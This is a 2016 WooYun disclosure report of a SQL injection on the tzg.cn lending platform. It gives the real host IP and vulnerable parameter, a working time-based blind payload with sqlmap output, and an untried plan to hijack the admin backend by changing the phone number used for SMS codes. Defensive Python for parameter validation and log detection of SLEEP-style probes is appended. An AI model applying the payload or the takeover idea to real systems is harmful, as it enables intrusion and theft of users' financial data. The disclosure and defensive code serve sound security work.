
Defect ID: wooyun-2016-0168437

Title: Financial security: root-privilege SQL injection at 铜掌柜 (tzg.cn) exposing 171 tables

Vendor: tzg.cn

Author: 路人甲

Submitted: 2016-01-08 15:49

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-08: Details sent to the vendor, awaiting vendor handling
2016-01-08: Vendor confirmed; details visible to the vendor only
2016-01-18: Details disclosed to core white hats and domain experts
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public

Summary:

Injection, injection again. I saw an earlier injection report against this vendor marked "not reproduced"; I don't know whether the vendor doesn't know how or what. If it still can't be reproduced, PM me.

Detailed description:

http://122.224.156.194:9090/daikuantouzi?rateEnd=10&rateBegin=0&istate=10&pageIndex=11
The istate parameter is injectable.

1.png

root privileges; 171 tables leaked. User data runs to several hundred thousand records.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: istate (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: rateEnd=10&rateBegin=0&istate=10) AND (SELECT * FROM (SELECT(SLEEP(5)))CZjr) AND (9985=9985&pageIndex=11
---
back-end DBMS: MySQL 5.0.12
Database: tzg
[171 tables]


There is also an admin backend at http://122.224.156.194:82/
It requires an SMS verification code as well; with the injection one could change the phone number, receive the code and get into the backend, but I didn't try it.
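As an added example (not part of the original report or the vendor's code), the two checks a defender would want around this endpoint: strict integer validation of istate and the other query parameters, which rejects the time-based payload quoted above before any SQL is built, and a scan over access-log lines for that payload shape. The endpoint and parameter names come from the report; the log format, the IP addresses and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Parameters that /daikuantouzi takes; each must be a plain integer.
INT_PARAMS = ("rateEnd", "rateBegin", "istate", "pageIndex")
INT_RE = re.compile(r"-?\d{1,9}")
# MySQL time-based blind probes lean on SLEEP()/BENCHMARK(); the report's
# payload also pushes a ')' and a subquery into what should be a bare integer.
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)

def validate_params(raw_query: str) -> dict:
    """Server-side fix: each integer parameter must be present exactly once
    and be a plain integer; otherwise raise ValueError so the handler answers
    HTTP 400 instead of building SQL from the raw value."""
    parsed = parse_qs(raw_query, keep_blank_values=True)
    clean = {}
    for name in INT_PARAMS:
        values = parsed.get(name, [])
        if len(values) != 1 or not INT_RE.fullmatch(values[0]):
            raise ValueError(f"parameter {name!r} must be a single integer")
        clean[name] = int(values[0])
    return clean

def is_suspected_probe(raw_query: str) -> bool:
    """Detection side: URL-decode once, look for time-based signatures,
    then reuse the strict validator as a second signal."""
    if TIME_BASED_RE.search(unquote_plus(raw_query)):
        return True
    try:
        validate_params(raw_query)
    except ValueError:
        return True
    return False

def scan_access_log(lines):
    """Return log lines whose GET query string looks like a probe; the log
    format is the constructed 'IP - - [ts] "GET /path?q HTTP/1.1" status'."""
    request_re = re.compile(r'"GET \S*\?(\S+) HTTP/')
    return [ln for ln in lines
            if (m := request_re.search(ln)) and is_suspected_probe(m.group(1))]

# Constructed sample lines; the second carries the payload quoted in the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jan/2016:15:40:01 +0800] "GET /daikuantouzi?rateEnd=10&rateBegin=0&istate=10&pageIndex=11 HTTP/1.1" 200',
    '10.0.0.9 - - [08/Jan/2016:15:40:07 +0800] "GET /daikuantouzi?rateEnd=10&rateBegin=0'
    '&istate=10)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))CZjr)%20AND%20(9985%3D9985&pageIndex=11 HTTP/1.1" 200',
    '10.0.0.9 - - [08/Jan/2016:15:41:12 +0800] "GET /daikuantouzi?rateEnd=10&rateBegin=0&istate=abc&pageIndex=1 HTTP/1.1" 500',
]
```

The validator is the actual fix: bind the resulting integers as query parameters and the subquery never reaches MySQL; the log scan is only for finding probes already in the access logs.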

Proof of vulnerability:


Fix proposal:

Copyright: please credit 路人甲@乌云 when reposting


Vulnerability responses

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed at: 2016-01-08 18:19

Vendor reply:

Thanks

Latest status:

None yet